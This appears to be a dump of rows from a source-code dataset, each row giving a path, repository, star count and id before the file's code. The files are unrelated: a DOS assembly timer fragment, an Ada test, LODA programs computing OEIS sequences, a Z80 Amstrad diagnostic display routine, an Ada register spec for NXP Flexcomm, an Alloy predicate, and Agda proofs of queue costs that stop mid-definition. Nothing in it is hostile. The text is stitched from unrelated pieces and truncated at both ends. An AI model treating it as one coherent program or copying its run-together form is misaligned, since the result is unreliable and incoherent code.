MOV BX, AX MOV AH, 2CH INT 21H ;CH=hour(0-23),CL=minute(0-59),DH=second(0-59),DL=centisecond(0-100) MOV AL, DH MOV AH, 0 IMUL AX,AX,1000 MOV DH, 0 IMUL DX,DX,10 ADD AX, DX CMP BX, 0 JNZ _T1 MOV CS:_TS, AX _T0: POP BX POP CX POP DX RET _T1: SUB AX, CS:_TS JNC _T2 ADD AX, 60000 _T2: MOV CX, 0 MOV BX, 10 _T3: MOV DX, 0 DIV BX PUSH DX INC CX CMP AX, 0 JNZ _T3 MOV BX, 0 _T4: POP AX ADD AL, '0' MOV CS:_TMSG[BX], AL INC BX LOOP _T4 PUSH DS MOV CS:_TMSG[BX+0], 0AH MOV CS:_TMSG[BX+1], 0DH MOV CS:_TMSG[BX+2], '$' LEA DX, _TS+2 PUSH CS POP DS MOV AH, 9 INT 21H POP DS JMP _T0 _TS DW ? DB 0AH, 0DH, 'Time elapsed in ms is ' _TMSG DB 12 DUP(0) TIMER ENDP CODE ENDS END START
tests/nonsmoke/functional/CompileTests/experimental_ada_tests/tests/dynamic_array.adb	ouankou/rose	488	19653	procedure dynamic_array is type OpenArray is array (Natural range <>) of Integer; subtype ShortArray is OpenArray(1..4); type ItemArray is access ShortArray; Items : ItemArray := new ShortArray; begin Items.all := ShortArray'(others => 0); end dynamic_array;
oeis/179/A179905.asm	neoneye/loda-programs	11	176415	; A179905: (1, 4, 7, 10, 13,...) convolved with (1, 0, 4, 7, 10, 13...); given A016777 = (1, 4, 7, 10, 13,...). ; Submitted by <NAME>(s4) ; 1,4,11,33,79,158,279,451,683,984,1363,1829,2391,3058,3839,4743,5779,6956,8283,9769,11423,13254,15271,17483,19899,22528,25379,28461,31783,35354,39183,43279,47651,52308,57259,62513,68079,73966,80183,86739,93643,100904,108531,116533,124919,133698,142879,152471,162483,172924,183803,195129,206911,219158,231879,245083,258779,272976,287683,302909,318663,334954,351791,369183,387139,405668,424779,444481,464783,485694,507223,529379,552171,575608,599699,624453,649879,675986,702783,730279,758483,787404 mov $4,$0 lpb $0 mov $0,0 add $1,2 lpe mov $2,$4 add $2,8 add $1,$2 mov $3,$4 bin $3,2 mul $3,$4 mov $2,$3 mul $2,3 add $1,$2 mov $0,$1 sub $0,7
oeis/027/A027024.asm	neoneye/loda-programs	11	1099	<reponame>neoneye/loda-programs ; A027024: a(n) = T(n,n+2), T given by A027023. ; Submitted by <NAME>(s4) ; 1,5,13,27,53,101,189,351,649,1197,2205,4059,7469,13741,25277,46495,85521,157301,289325,532155,978789,1800277,3311229,6090303,11201817,20603357,37895485,69700667,128199517,235795677,433695869,797691071,1467182625,2698569573,4963443277,9129195483,16791208341,30883847109,56804250941,104479306399,192167404457,353450961805,650097672669,1195716038939,2199264673421,4045078385037,7440059097405,13684402155871,25169539638321,46294000891605,85147942685805,156611483215739,288053426793157,529812852694709 add $0,2 seq $0,8937 ; a(n) = Sum_{k=0..n} T(k) where T(n) are the tribonacci numbers A000073. mul $0,2 sub $0,3
oeis/145/A145543.asm	neoneye/loda-programs	11	244665	; A145543: Denominators in continued fraction expansion of sqrt(3/5). ; Submitted by <NAME> ; 1,4,9,31,71,244,559,1921,4401,15124,34649,119071,272791,937444,2147679,7380481,16908641,58106404,133121449,457470751,1048062951,3601659604,8251382159,28355806081,64962994321,223244789044,511452572409,1757602506271,4026657584951 seq $0,41022 ; Numerators of continued fraction convergents to sqrt(15). dif $0,3
src/DisplayFailingBits.asm	gschizas/amstrad-diagnostics	60	21390	<gh_stars>10-100 INCLUDE "Colors.asm" ColorBackground EQU ColorBlack ColorNumber EQU ColorWhite ColorGood EQU ColorLime ColorBad EQU ColorBrightRed DisplayFailingBits: di ; Turn the whole screen into a giant border ; out &bc00,6:out &bd00,0 ld bc,#bc06 out (c),c ld bc,#bd00 out (c),c ;; Select color 0 register ld bc, #7F00 out (c), c ld c, ColorBlack out (c), c ; Wait for Vsync .frameLoop: ld b,#f5 .vbLoop1 in a,(c) rra jr c,.vbLoop1 .vbLoop2 in a,(c) rra jr nc,.vbLoop2 ;; Select Border color register ld bc, #7F10 out (c), c ld c, ColorBackground out (c), c ld bc, #6103 .waitLoop: djnz .waitLoop ; [3] dec c ; [1] jr nz, .waitLoop ; [3] ld bc, #7F10 out (c), c ld c, ColorBackground ld h, ColorNumber ; out (c), h DEFINE F #ed,#61, ; out (c), c DEFINE _ #ed,#49, ; out (c), l DEFINE B #ed,#69, DEFINE EOL , #ed,#49, #ed,#49 /* ld a,#f ; [2] .testLoop: dec a ; [1] jr nz,.testLoop ; [3] / [2] nop nop nop */ DEFINE WAIT16 #3E, #0f, #3D, #20, #fD, 0, 0, 0 DEFINE WAIT12 #3E, #0b, #3D, #20, #fD, 0, 0, 0 DEFINE WAIT9 #3E, #08, #3D, #20, #fD, 0, 0, 0 INCLUDE "ColorChange.asm" db WAIT16 db WAIT16 db WAIT16 ; 0 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 1 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ B WAIT9 EOL db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db _ F _ _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 2 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 3 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 4 db F _ F _ WAIT12 db F _ F _ WAIT12 db F _ F _ WAIT12 db F _ F _ WAIT12 db F _ F _ WAIT12 db F _ F _ WAIT12 db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 5 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 6 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F _ _ _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F F F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F _ F _ B WAIT9 EOL db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db WAIT16 db WAIT16 db WAIT12 INCLUDE "ColorChange.asm" ; 7 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db F F F _ WAIT12 db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ B WAIT9 EOL db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 db _ _ F _ WAIT12 UNDEFINE F UNDEFINE _ UNDEFINE B UNDEFINE EOL nop nop nop nop nop nop jp .frameLoop
libsrc/_DEVELOPMENT/math/float/math48/lm/z80/asm_dlt_s.asm	jpoikela/z88dk	640	243160	SECTION code_clib SECTION code_fp_math48 PUBLIC asm_dlt_s EXTERN am48_dlt_s defc asm_dlt_s = am48_dlt_s
oeis/052/A052972.asm	neoneye/loda-programs	11	164031	; A052972: Expansion of (1-x^3)/(1-x-x^2-x^3+x^5). ; Submitted by <NAME> ; 1,1,2,3,6,10,18,32,57,101,180,320,569,1012,1800,3201,5693,10125,18007,32025,56956,101295,180151,320395,569816,1013406,1802322,3205393,5700726,10138625,18031338,32068367,57032937,101431916,180394595 add $0,1 mov $5,1 lpb $0 sub $0,1 add $1,$5 add $1,1 sub $4,$5 mul $4,$2 mov $3,$4 mov $4,$2 mov $2,$1 div $3,$1 mov $1,$3 add $1,$5 max $1,1 sub $4,1 add $5,$4 lpe mov $0,$2 sub $0,1
arch/ARM/NXP/svd/lpc55s6x/nxp_svd-flexcomm.ads	morbos/Ada_Drivers_Library	2	13619	<filename>arch/ARM/NXP/svd/lpc55s6x/nxp_svd-flexcomm.ads -- Copyright 2016-2019 NXP -- All rights reserved.SPDX-License-Identifier: BSD-3-Clause -- This spec has been automatically generated from LPC55S6x.svd pragma Restrictions (No_Elaboration_Code); pragma Ada_2012; pragma Style_Checks (Off); with HAL; with System; package NXP_SVD.FLEXCOMM is pragma Preelaborate; --------------- -- Registers -- --------------- -- Peripheral Select. This field is writable by software. type PSELID_PERSEL_Field is ( -- No peripheral selected. No_Periph_Selected, -- USART function selected. Usart, -- SPI function selected. Spi, -- I2C function selected. I2C, -- I2S transmit function selected. I2S_Transmit, -- I2S receive function selected. I2S_Receive) with Size => 3; for PSELID_PERSEL_Field use (No_Periph_Selected => 0, Usart => 1, Spi => 2, I2C => 3, I2S_Transmit => 4, I2S_Receive => 5); -- Lock the peripheral select. This field is writable by software. type PSELID_LOCK_Field is ( -- Peripheral select can be changed by software. Unlocked, -- Peripheral select is locked and cannot be changed until this Flexcomm -- or the entire device is reset. Locked) with Size => 1; for PSELID_LOCK_Field use (Unlocked => 0, Locked => 1); -- USART present indicator. This field is Read-only. type PSELID_USARTPRESENT_Field is ( -- This Flexcomm does not include the USART function. Not_Present, -- This Flexcomm includes the USART function. Present) with Size => 1; for PSELID_USARTPRESENT_Field use (Not_Present => 0, Present => 1); -- SPI present indicator. This field is Read-only. type PSELID_SPIPRESENT_Field is ( -- This Flexcomm does not include the SPI function. Not_Present, -- This Flexcomm includes the SPI function. Present) with Size => 1; for PSELID_SPIPRESENT_Field use (Not_Present => 0, Present => 1); -- I2C present indicator. This field is Read-only. type PSELID_I2CPRESENT_Field is ( -- This Flexcomm does not include the I2C function. Not_Present, -- This Flexcomm includes the I2C function. Present) with Size => 1; for PSELID_I2CPRESENT_Field use (Not_Present => 0, Present => 1); -- I 2S present indicator. This field is Read-only. type PSELID_I2SPRESENT_Field is ( -- This Flexcomm does not include the I2S function. Not_Present, -- This Flexcomm includes the I2S function. Present) with Size => 1; for PSELID_I2SPRESENT_Field use (Not_Present => 0, Present => 1); subtype PSELID_ID_Field is HAL.UInt20; -- Peripheral Select and Flexcomm ID register. type PSELID_Register is record -- Peripheral Select. This field is writable by software. PERSEL : PSELID_PERSEL_Field := NXP_SVD.FLEXCOMM.No_Periph_Selected; -- Lock the peripheral select. This field is writable by software. LOCK : PSELID_LOCK_Field := NXP_SVD.FLEXCOMM.Unlocked; -- Read-only. USART present indicator. This field is Read-only. USARTPRESENT : PSELID_USARTPRESENT_Field := NXP_SVD.FLEXCOMM.Not_Present; -- Read-only. SPI present indicator. This field is Read-only. SPIPRESENT : PSELID_SPIPRESENT_Field := NXP_SVD.FLEXCOMM.Not_Present; -- Read-only. I2C present indicator. This field is Read-only. I2CPRESENT : PSELID_I2CPRESENT_Field := NXP_SVD.FLEXCOMM.Not_Present; -- Read-only. I 2S present indicator. This field is Read-only. I2SPRESENT : PSELID_I2SPRESENT_Field := NXP_SVD.FLEXCOMM.Not_Present; -- unspecified Reserved_8_11 : HAL.UInt4 := 16#0#; -- Read-only. Flexcomm ID. ID : PSELID_ID_Field := 16#101#; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for PSELID_Register use record PERSEL at 0 range 0 .. 2; LOCK at 0 range 3 .. 3; USARTPRESENT at 0 range 4 .. 4; SPIPRESENT at 0 range 5 .. 5; I2CPRESENT at 0 range 6 .. 6; I2SPRESENT at 0 range 7 .. 7; Reserved_8_11 at 0 range 8 .. 11; ID at 0 range 12 .. 31; end record; subtype PID_APERTURE_Field is HAL.UInt8; subtype PID_MINOR_REV_Field is HAL.UInt4; subtype PID_MAJOR_REV_Field is HAL.UInt4; subtype PID_ID_Field is HAL.UInt16; -- Peripheral identification register. type PID_Register is record -- Read-only. size aperture for the register port on the bus (APB or -- AHB). APERTURE : PID_APERTURE_Field; -- Read-only. Minor revision of module implementation. MINOR_REV : PID_MINOR_REV_Field; -- Read-only. Major revision of module implementation. MAJOR_REV : PID_MAJOR_REV_Field; -- Read-only. Module identifier for the selected function. ID : PID_ID_Field; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for PID_Register use record APERTURE at 0 range 0 .. 7; MINOR_REV at 0 range 8 .. 11; MAJOR_REV at 0 range 12 .. 15; ID at 0 range 16 .. 31; end record; ----------------- -- Peripherals -- ----------------- -- Flexcomm serial communication type FLEXCOMM_Peripheral is record -- Peripheral Select and Flexcomm ID register. PSELID : aliased PSELID_Register; -- Peripheral identification register. PID : aliased PID_Register; end record with Volatile; for FLEXCOMM_Peripheral use record PSELID at 16#FF8# range 0 .. 31; PID at 16#FFC# range 0 .. 31; end record; -- Flexcomm serial communication FLEXCOMM0_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40086000#); -- Flexcomm serial communication FLEXCOMM1_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40087000#); -- Flexcomm serial communication FLEXCOMM2_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40088000#); -- Flexcomm serial communication FLEXCOMM3_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40089000#); -- Flexcomm serial communication FLEXCOMM4_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#4008A000#); -- Flexcomm serial communication FLEXCOMM5_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40096000#); -- Flexcomm serial communication FLEXCOMM6_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40097000#); -- Flexcomm serial communication FLEXCOMM7_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40098000#); -- Flexcomm serial communication FLEXCOMM8_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#4009F000#); end NXP_SVD.FLEXCOMM;
alloy4fun_models/trashltl/models/9/39ghxD27cHXvfYiBm.als	Kaixi26/org.alloytools.alloy	0	2426	<gh_stars>0 open main pred id39ghxD27cHXvfYiBm_prop10 { always all f: Protected \| always f not in Trash and always f not in File } pred __repair { id39ghxD27cHXvfYiBm_prop10 } check __repair { id39ghxD27cHXvfYiBm_prop10 <=> prop10o }
src/Examples/Queue.agda	jonsterling/agda-calf	29	11551	<filename>src/Examples/Queue.agda {-# OPTIONS --prop --rewriting #-} module Examples.Queue where open import Calf.CostMonoid open import Calf.CostMonoids using (ℕ-CostMonoid) costMonoid = ℕ-CostMonoid open CostMonoid costMonoid using (ℂ) open import Calf costMonoid open import Calf.Types.Nat open import Calf.Types.Unit open import Calf.Types.Sum open import Calf.Types.Bounded costMonoid open import Function open import Data.Nat open import Data.Nat.Properties import Data.Integer as Int import Data.Integer.Properties as IntP open import Data.List renaming (sum to lsum) open import Data.Product open import Relation.Binary.PropositionalEquality as P record Queue (A : tp pos) : Set where field Q : tp pos emp : val Q enq : cmp (Π Q λ _ → Π A λ _ → F Q) deq : cmp (Π Q λ _ → F (sum unit (Σ++ Q λ _ → A))) module CostList (A : tp pos) (n : ℕ) where -- Suppose we want to implement the Queue signature above using lists. -- One cost model is to count the number of times a cons node is inspected. -- This is implemented by the following annotated list type: -- destructing a cons node of type list n A consumes n steps. postulate list : tp pos nil : val list cons : val A → val list → val list list/ind : (l : val list) → (X : val list → tp neg) → cmp (X nil) → ((a : val A) → (l : val list) → (r : val (U (X l))) → cmp (X (cons a l))) → cmp (X l) list/ind/nil : ∀ {X} → (e0 : cmp (X nil)) → (e1 : (a : val A) → (l : val list) → (r : val (U (X l))) → cmp (X (cons a l))) → list/ind nil X e0 e1 ≡ e0 {-# REWRITE list/ind/nil #-} list/ind/cons : ∀ {X} → (a : val A) → (l : val list) → (e0 : cmp (X nil)) → (e1 : (a : val A) → (l : val list) → (r : val (U (X l))) → cmp (X (cons a l))) → list/ind (cons a l) X e0 e1 ≡ step (X (cons a l)) n (e1 a l (list/ind l X e0 e1)) {-# REWRITE list/ind/cons #-} list/match : (l : val list) → (X : val list → tp neg) → cmp (X nil) → ((a : val A) → (l : val list) → cmp (X (cons a l))) → cmp (X l) list/match l X e0 e1 = list/ind l X e0 (λ a l _ → e1 a l) bound/list/match : ∀ (l : val list) (X : val list → tp pos) {e0 : val (U (F (X nil)))} {e1 : (a : val A) → (l : val list) → val (U (F (X (cons a l))))} {p0 : val (U cost)} {p1 : (a : val A) → (l : val list) → val (U cost)} → IsBounded (X nil) e0 p0 → ((a : val A) → (l : val list) → IsBounded (X (cons a l)) (e1 a l) (p1 a l)) → IsBounded (X l) (list/match l (F ∘ X) e0 e1) (list/match l (λ _ → cost) p0 (λ a l → n + p1 a l)) bound/list/match l X {e0} {e1} {p0} {p1} ub0 ub1 = list/match l (λ l → meta (IsBounded (X l) (list/match l (F ∘ X) e0 e1) (list/match l (λ _ → cost) p0 (λ a l → n + p1 a l)))) ub0 λ a l → bound/circ n (bound/step n (p1 a l) (ub1 a l)) len : val list → ℕ len l = list/ind l (λ _ → meta ℕ) 0 λ a l r → 1 + r module Ex/CostList where open CostList nat 0 ex : val list ex = cons 0 (cons 1 nil) module Rev (A : tp pos) where open CostList A 1 revAppend : cmp (Π list λ _ → Π list λ _ → F list) revAppend l = list/ind l (λ _ → Π list λ _ → F list) (λ l' → ret l') λ x _ r → λ l' → r (cons x l') revAppend/lemma/cons : ∀ x xs l' → ◯ (∃ λ y → ∃ λ ys → (len ys ≡ len xs + len l') × revAppend (cons x xs) l' ≡ ret (cons y ys)) revAppend/lemma/cons x xs = list/ind xs (λ xs → meta (∀ x l' → ◯ (∃ λ y → ∃ λ ys → (len ys ≡ len xs + len l') × revAppend (cons x xs) l' ≡ ret (cons y ys)))) (λ x l' u → (x , l' , refl , step/ext (F list) (ret (cons x l')) 1 u)) (λ x' xs' ih x l' u → let (y , ys , h , ≡) = ih x' (cons x l') u in let open ≡-Reasoning in y , ys , ( begin len ys ≡⟨ h ⟩ len xs' + len (cons x l') ≡⟨⟩ len xs' + step (meta ℕ) 1 (suc (len l')) ≡⟨ cong (len xs' +_) (step/ext (meta ℕ) (suc (len l')) 1 u) ⟩ len xs' + suc (len l') ≡⟨ +-suc (len xs') (len l') ⟩ suc (len xs' + len l') ≡⟨⟩ suc (len xs') + len l' ≡˘⟨ cong (_+ len l') (step/ext (meta ℕ) (suc (len xs')) 1 u) ⟩ step (meta ℕ) 1 (suc (len xs')) + len l' ≡⟨⟩ len (cons x' xs') + len l' ∎ ) , ( begin revAppend (cons x (cons x' xs')) l' ≡⟨⟩ step (F list) 1 (revAppend (cons x' xs') (cons x l')) ≡⟨ step/ext (F list) _ 1 u ⟩ revAppend (cons x' xs') (cons x l') ≡⟨ (≡) ⟩ ret (cons y ys) ∎ )) x revAppend/cost : cmp (Π list λ _ → Π list λ _ → cost) revAppend/cost l l' = len l revAppend≤revAppend/cost : ∀ l l' → IsBounded list (revAppend l l') (revAppend/cost l l') revAppend≤revAppend/cost l = list/ind l (λ l → meta (∀ l' → IsBounded list (revAppend l l') (revAppend/cost l l'))) (λ l' → bound/ret) (λ a l r → λ l' → bound/circ 1 (bound/step 1 (len l) (r (cons a l')))) rev : cmp (Π list λ _ → F list) rev l = revAppend l nil rev/lemma/cons : ∀ x xs → ◯ (∃ λ y → ∃ λ ys → len ys ≡ len xs × rev (cons x xs) ≡ ret (cons y ys)) rev/lemma/cons x xs = subst (λ n → ◯ (∃ λ y → ∃ λ ys → len ys ≡ n × rev (cons x xs) ≡ ret (cons y ys))) (+-identityʳ _) (revAppend/lemma/cons x xs nil) rev/cost : cmp (Π list λ _ → cost) rev/cost l = len l rev≤rev/cost : ∀ l → IsBounded list (rev l) (rev/cost l) rev≤rev/cost l = revAppend≤revAppend/cost l nil -- Implement Queue with a pair of lists; (f , b) represents the queue f :: rev b. module FrontBack (A : tp pos) where -- For simplicity, we charge 1 step for each cons node destruction. open CostList A 1 open Rev A Q : tp pos Q = Σ++ list λ _ → list emp : val Q emp = (nil , nil) enq : cmp (Π Q λ _ → Π A λ _ → F Q) enq (f , b) x = ret (f , cons x b) enq/cost : cmp (Π Q λ _ → Π A λ _ → cost) enq/cost (f , b) x = 0 enq≤enq/cost : ∀ q x → IsBounded Q (enq q x) (enq/cost q x) enq≤enq/cost q x = bound/ret deq-tp = sum unit (Σ++ Q λ _ → A) deq/emp : cmp (Π list λ _ → F deq-tp) deq/emp l = list/match l (λ _ → F deq-tp) (ret (inj₁ triv)) λ a l' → ret (inj₂ ((l' , nil) , a)) deq/emp/cost : cmp (Π list λ _ → cost) deq/emp/cost l = list/match l (λ _ → cost) 0 λ a l' → 1 + 0 deq/emp≤deq/emp/cost : ∀ l → IsBounded deq-tp (deq/emp l) (deq/emp/cost l) deq/emp≤deq/emp/cost l = bound/list/match l (λ _ → deq-tp) bound/ret λ a l' → bound/ret deq : cmp (Π Q λ _ → F deq-tp) deq (f , b) = list/match f (λ _ → F deq-tp) (bind (F deq-tp) (rev b) (λ b' → deq/emp b')) λ a l → ret (inj₂ ((l , b) , a)) deq/cost : cmp (Π Q λ _ → cost) deq/cost (f , b) = list/match f (λ _ → cost) (bind cost (rev b) (λ b' → rev/cost b + deq/emp/cost b')) λ a l → 1 + 0 deq/cost/closed : cmp (Π Q λ _ → cost) deq/cost/closed (f , b) = list/match f (λ _ → cost) (list/match b (λ _ → cost) 0 (λ _ b' → 1 + len b)) λ _ _ → 1 deq/cost≤deq/cost/closed : ∀ q → ◯ (deq/cost q ≤ deq/cost/closed q) deq/cost≤deq/cost/closed (f , b) u = list/match f (λ f → meta (deq/cost (f , b) ≤ deq/cost/closed (f , b))) (list/match b (λ b → meta (deq/cost (nil , b) ≤ deq/cost/closed (nil , b))) ≤-refl λ x xs → let open ≤-Reasoning in let (y , ys , _ , ≡) = rev/lemma/cons x xs u in begin deq/cost (nil , cons x xs) ≡⟨⟩ bind cost (rev (cons x xs)) (λ b' → rev/cost (cons x xs) + deq/emp/cost b') ≡⟨⟩ bind cost (rev (cons x xs)) (λ b' → rev/cost (cons x xs) + deq/emp/cost b') ≡⟨ cong (λ e → bind cost e (λ b' → rev/cost (cons x xs) + deq/emp/cost b')) (≡) ⟩ rev/cost (cons x xs) + deq/emp/cost (cons y ys) ≡⟨⟩ step cost 1 (suc (len xs)) + step cost 1 1 ≡⟨ cong₂ _+_ (step/ext cost (suc (len xs)) 1 u) (step/ext cost 1 1 u) ⟩ suc (len xs) + 1 ≡⟨ +-comm (suc (len xs)) 1 ⟩ suc (suc (len xs)) ≡˘⟨ cong suc (step/ext cost _ 1 u) ⟩ suc (step cost 1 (suc (len xs))) ≡⟨⟩ suc (len (cons x xs)) ≡˘⟨ step/ext cost _ 1 u ⟩ step cost 1 (suc (len (cons x xs))) ≡⟨⟩ list/match (cons x xs) (λ _ → cost) 0 (λ _ b' → 1 + len (cons x xs)) ≡⟨⟩ deq/cost/closed (nil , cons x xs) ∎ ) λ _ _ → ≤-refl deq≤deq/cost : ∀ q → IsBounded deq-tp (deq q) (deq/cost q) deq≤deq/cost (f , b) = bound/list/match f (λ _ → deq-tp) (bound/bind (rev/cost b) _ (rev≤rev/cost b) λ b' → deq/emp≤deq/emp/cost b') λ a l → bound/ret deq≤deq/cost/closed : ∀ q → IsBounded deq-tp (deq q) (deq/cost/closed q) deq≤deq/cost/closed q = bound/relax (deq/cost≤deq/cost/closed q) (deq≤deq/cost q) -- Amortized analysis for front-back queue. -- The goal is to bound the cost of a single-thread sequence of queue operations staring with an initial queue q0, -- where an operation is either an enqueue or a dequeue. data op : Set where op/enq : (x : val A) → op op/deq : op -- Potential function ϕ : val Q → ℕ ϕ (f , b) = len f + 2 * len b -- o operate q is the computation induced by operation o on queue q. -- Needed because deq doesn't always return a queue (e.g., deq emp). -- In these cases we just return the empty queue. _operate_ : op → val Q → cmp (F Q) (op/enq x) operate q = 